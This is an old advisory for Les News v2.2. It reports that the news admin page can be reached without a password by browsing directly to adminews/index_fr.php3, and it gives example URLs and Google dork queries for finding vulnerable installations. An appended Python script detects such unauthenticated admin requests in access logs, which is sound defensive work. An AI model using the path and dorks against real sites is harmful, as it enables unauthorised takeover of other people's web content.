Les News v2.2 [Admin news without password]

2007.02.12
Credit: sn0oPy
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

* Les News v2.2 [Admin news without password]
* By : sn0oPy
* Risk : very high
* site : http://stombi.free.fr/
* exploit : add adminews/index_fr.php3 to the /lesnews/ directory
  example :
  http://www.test.ma/lesnews/lesnews_fr.php3
  http://www.test.ma/lesnews/adminews/index_fr.php3
  Dork :
  inurl:"/lesnews/lesnews_fr.php3"
  inurl:"/lesnews/lesnews_en.php3"
  inurl:"/lesnews/lesnews_de.php3"
  inurl:"/lesnews/lesnews_it.php3"
* contact : sn0oPy (at) avenir-geopolitique (dot) net
* greetz : [subzero], http://forums.avenir-geopolitique.net.
reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2622
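A defender-side check for the exposure described above, added here as an example (not part of the original advisory or of Les News): it scans web server access logs in combined format for requests under the `adminews/` directory that were served with a 2xx status and no HTTP-authenticated user. The function name and the log lines are constructed for illustration, and it assumes the site intends to put HTTP authentication in front of that directory.

```python
import re
from urllib.parse import unquote

# Combined log format: host ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)
# Any request under an adminews/ directory, wherever Les News is installed.
ADMIN_RE = re.compile(r'/adminews(/|$)', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, made-up user "editor").
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Feb/2007:10:01:02 +0100] "GET /lesnews/lesnews_fr.php3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Feb/2007:10:02:10 +0100] "GET /lesnews/adminews/index_fr.php3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Feb/2007:10:02:40 +0100] "POST /lesnews/AdmiNews/index_fr.php3?id=3 HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '203.0.113.5 - editor [12/Feb/2007:10:05:00 +0100] "GET /lesnews/adminews/index_fr.php3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [12/Feb/2007:10:06:30 +0100] "GET /lesnews/adminews/index_fr.php3 HTTP/1.1" 401 401 "-" "Mozilla/5.0"',
]


def unauthenticated_admin_hits(lines):
    """Return (host, time, method, path) for admin-directory requests that
    were served (2xx) although no HTTP-authenticated user is logged."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        # Drop the query string and decode percent-encoding before matching.
        path = unquote(m['path'].split('?', 1)[0])
        if not ADMIN_RE.search(path):
            continue
        served = m['status'].startswith('2')
        anonymous = m['user'] == '-'
        if served and anonymous:
            hits.append((m['host'], m['time'], m['method'], path))
    return hits


if __name__ == "__main__":
    for hit in unauthenticated_admin_hits(SAMPLE_LOG):
        print(*hit)
```

Hits mean the admin pages were delivered to a client that never authenticated; a 401/403 on the same path, or a populated user field, means access control in front of the directory is working.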



Copyright 2017, cxsecurity.com

 
